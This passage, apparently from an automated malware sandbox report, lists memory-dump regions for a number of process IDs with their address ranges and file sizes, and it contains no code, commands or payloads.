                                                                      1.0MB

                                                                    • memory/1780-323-0x0000000005430000-0x0000000005A48000-memory.dmp
                                                                      Filesize

                                                                      6.1MB

                                                                    • memory/1812-198-0x0000000000000000-mapping.dmp
                                                                    • memory/1944-338-0x0000000000000000-mapping.dmp
                                                                    • memory/2068-326-0x0000000000000000-mapping.dmp
                                                                    • memory/2068-331-0x00007FFD778D0000-0x00007FFD78391000-memory.dmp
                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/2068-184-0x0000000000000000-mapping.dmp
                                                                    • memory/2072-280-0x0000000000000000-mapping.dmp
                                                                    • memory/2084-278-0x0000000000000000-mapping.dmp
                                                                    • memory/2132-284-0x0000000000000000-mapping.dmp
                                                                    • memory/2160-215-0x0000000000400000-0x00000000005BA000-memory.dmp
                                                                      Filesize

                                                                      1.7MB

                                                                    • memory/2160-214-0x000000000086F000-0x0000000000884000-memory.dmp
                                                                      Filesize

                                                                      84KB

                                                                    • memory/2160-204-0x0000000000000000-mapping.dmp
                                                                    • memory/2296-161-0x0000000000000000-mapping.dmp
                                                                    • memory/2328-181-0x0000000000000000-mapping.dmp
                                                                    • memory/2328-189-0x0000000140000000-0x000000014061E000-memory.dmp
                                                                      Filesize

                                                                      6.1MB

                                                                    • memory/2492-169-0x0000000000000000-mapping.dmp
                                                                    • memory/2492-172-0x00000000006C0000-0x0000000000E48000-memory.dmp
                                                                      Filesize

                                                                      7.5MB

                                                                    • memory/2512-358-0x0000000000000000-mapping.dmp
                                                                    • memory/2964-302-0x0000000000000000-mapping.dmp
                                                                    • memory/2988-194-0x0000000000000000-mapping.dmp
                                                                    • memory/2988-371-0x0000000000000000-mapping.dmp
                                                                    • memory/2996-301-0x00007FFD778D0000-0x00007FFD78391000-memory.dmp
                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/2996-304-0x00007FFD778D0000-0x00007FFD78391000-memory.dmp
                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/3024-267-0x0000000000000000-mapping.dmp
                                                                    • memory/3052-160-0x0000000000400000-0x0000000000570000-memory.dmp
                                                                      Filesize

                                                                      1.4MB

                                                                    • memory/3052-159-0x000000000087F000-0x0000000000894000-memory.dmp
                                                                      Filesize

                                                                      84KB

                                                                    • memory/3052-153-0x0000000000000000-mapping.dmp
                                                                    • memory/3068-297-0x00007FFD777B0000-0x00007FFD78271000-memory.dmp
                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/3068-277-0x00007FFD777B0000-0x00007FFD78271000-memory.dmp
                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/3128-290-0x0000000000000000-mapping.dmp
                                                                    • memory/3232-188-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                      Filesize

                                                                      1.2MB

                                                                    • memory/3232-174-0x0000000000000000-mapping.dmp
                                                                    • memory/3232-178-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                      Filesize

                                                                      1.2MB

                                                                    • memory/3232-179-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                      Filesize

                                                                      1.2MB

                                                                    • memory/3256-264-0x0000000000000000-mapping.dmp
                                                                    • memory/3324-292-0x0000000000000000-mapping.dmp
                                                                    • memory/3340-294-0x0000000000000000-mapping.dmp
                                                                    • memory/3468-208-0x00000000006FF000-0x0000000000714000-memory.dmp
                                                                      Filesize

                                                                      84KB

                                                                    • memory/3468-201-0x0000000000000000-mapping.dmp
                                                                    • memory/3468-216-0x0000000000400000-0x0000000000467000-memory.dmp
                                                                      Filesize

                                                                      412KB

                                                                    • memory/3468-212-0x0000000000400000-0x0000000000467000-memory.dmp
                                                                      Filesize

                                                                      412KB

                                                                    • memory/3468-210-0x00000000005B0000-0x00000000005B9000-memory.dmp
                                                                      Filesize

                                                                      36KB

                                                                    • memory/3472-176-0x0000000002137000-0x00000000021C9000-memory.dmp
                                                                      Filesize

                                                                      584KB

                                                                    • memory/3472-166-0x0000000000000000-mapping.dmp
                                                                    • memory/3528-359-0x0000000000000000-mapping.dmp
                                                                    • memory/3740-232-0x0000000000000000-mapping.dmp
                                                                    • memory/3796-149-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                      Filesize

                                                                      1.2MB

                                                                    • memory/3796-145-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                      Filesize

                                                                      1.2MB

                                                                    • memory/3796-147-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                      Filesize

                                                                      1.2MB

                                                                    • memory/3796-168-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                      Filesize

                                                                      1.2MB

                                                                    • memory/3796-143-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                      Filesize

                                                                      1.2MB

                                                                    • memory/3796-142-0x0000000000000000-mapping.dmp
                                                                    • memory/3800-351-0x0000000000000000-mapping.dmp
                                                                    • memory/3824-295-0x0000000000000000-mapping.dmp
                                                                    • memory/3840-268-0x00007FFD777B0000-0x00007FFD78271000-memory.dmp
                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/3840-266-0x000001BD563E0000-0x000001BD56402000-memory.dmp
                                                                      Filesize

                                                                      136KB

                                                                    • memory/3840-269-0x00007FFD777B0000-0x00007FFD78271000-memory.dmp
                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/4048-347-0x0000000000000000-mapping.dmp
                                                                    • memory/4076-283-0x0000000000000000-mapping.dmp
                                                                    • memory/4164-229-0x0000000000000000-mapping.dmp
                                                                    • memory/4188-220-0x00000000007A8000-0x00000000007D1000-memory.dmp
                                                                      Filesize

                                                                      164KB

                                                                    • memory/4188-222-0x0000000000400000-0x0000000000575000-memory.dmp
                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/4188-262-0x00000000007A8000-0x00000000007D1000-memory.dmp
                                                                      Filesize

                                                                      164KB

                                                                    • memory/4200-363-0x0000000000000000-mapping.dmp
                                                                    • memory/4204-162-0x00000000006A9000-0x00000000006D3000-memory.dmp
                                                                      Filesize

                                                                      168KB

                                                                    • memory/4204-164-0x0000000000400000-0x0000000000575000-memory.dmp
                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/4204-136-0x0000000000000000-mapping.dmp
                                                                    • memory/4204-195-0x00000000006A9000-0x00000000006D3000-memory.dmp
                                                                      Filesize

                                                                      168KB

                                                                    • memory/4204-197-0x0000000000400000-0x0000000000575000-memory.dmp
                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/4204-163-0x0000000000600000-0x0000000000647000-memory.dmp
                                                                      Filesize

                                                                      284KB

                                                                    • memory/4280-209-0x0000000000000000-mapping.dmp
                                                                    • memory/4316-299-0x0000000000000000-mapping.dmp
                                                                    • memory/4324-289-0x00007FFD777B0000-0x00007FFD78271000-memory.dmp
                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/4324-285-0x0000000000000000-mapping.dmp
                                                                    • memory/4324-288-0x0000000000250000-0x0000000000258000-memory.dmp
                                                                      Filesize

                                                                      32KB

                                                                    • memory/4332-355-0x0000000000000000-mapping.dmp
                                                                    • memory/4380-228-0x0000000002950000-0x0000000002E3A000-memory.dmp
                                                                      Filesize

                                                                      4.9MB

                                                                    • memory/4380-263-0x0000000000400000-0x00000000008F6000-memory.dmp
                                                                      Filesize

                                                                      5.0MB

                                                                    • memory/4380-221-0x0000000000000000-mapping.dmp
                                                                    • memory/4380-233-0x0000000000400000-0x00000000008F6000-memory.dmp
                                                                      Filesize

                                                                      5.0MB

                                                                    • memory/4380-227-0x00000000024BB000-0x0000000002843000-memory.dmp
                                                                      Filesize

                                                                      3.5MB

                                                                    • memory/4692-293-0x0000000000000000-mapping.dmp
                                                                    • memory/4700-313-0x0000000005560000-0x00000000055C6000-memory.dmp
                                                                      Filesize

                                                                      408KB

                                                                    • memory/4700-312-0x0000000000020000-0x0000000000D2E000-memory.dmp
                                                                      Filesize

                                                                      13.1MB

                                                                    • memory/4700-305-0x0000000000000000-mapping.dmp
                                                                    • memory/4700-308-0x0000000000020000-0x0000000000D2E000-memory.dmp
                                                                      Filesize

                                                                      13.1MB

                                                                    • memory/4700-311-0x0000000000020000-0x0000000000D2E000-memory.dmp
                                                                      Filesize

                                                                      13.1MB

                                                                    • memory/4700-332-0x0000000006A00000-0x0000000006A92000-memory.dmp
                                                                      Filesize

                                                                      584KB

                                                                    • memory/4700-333-0x0000000007050000-0x00000000075F4000-memory.dmp
                                                                      Filesize

                                                                      5.6MB

                                                                    • memory/4724-180-0x0000000000000000-mapping.dmp
                                                                    • memory/4728-291-0x0000000000000000-mapping.dmp
                                                                    • memory/4800-239-0x0000000000400000-0x0000000000472000-memory.dmp
                                                                      Filesize

                                                                      456KB

                                                                    • memory/4800-237-0x0000000000400000-0x0000000000472000-memory.dmp
                                                                      Filesize

                                                                      456KB

                                                                    • memory/4800-241-0x0000000000400000-0x0000000000472000-memory.dmp
                                                                      Filesize

                                                                      456KB

                                                                    • memory/4800-265-0x0000000000400000-0x0000000000472000-memory.dmp
                                                                      Filesize

                                                                      456KB

                                                                    • memory/4800-235-0x0000000000400000-0x0000000000472000-memory.dmp
                                                                      Filesize

                                                                      456KB

                                                                    • memory/4800-242-0x000000004AB70000-0x000000004AC63000-memory.dmp
                                                                      Filesize

                                                                      972KB

                                                                    • memory/4800-234-0x0000000000000000-mapping.dmp
                                                                    • memory/4812-341-0x0000000000000000-mapping.dmp
                                                                    • memory/5000-276-0x0000000000000000-mapping.dmp
                                                                    • memory/5080-281-0x00007FFD777B0000-0x00007FFD78271000-memory.dmp
                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/5080-270-0x0000000000000000-mapping.dmp
                                                                    • memory/5080-273-0x00007FFD777B0000-0x00007FFD78271000-memory.dmp
                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/5080-274-0x0000000000CF0000-0x0000000001566000-memory.dmp
                                                                      Filesize

                                                                      8.5MB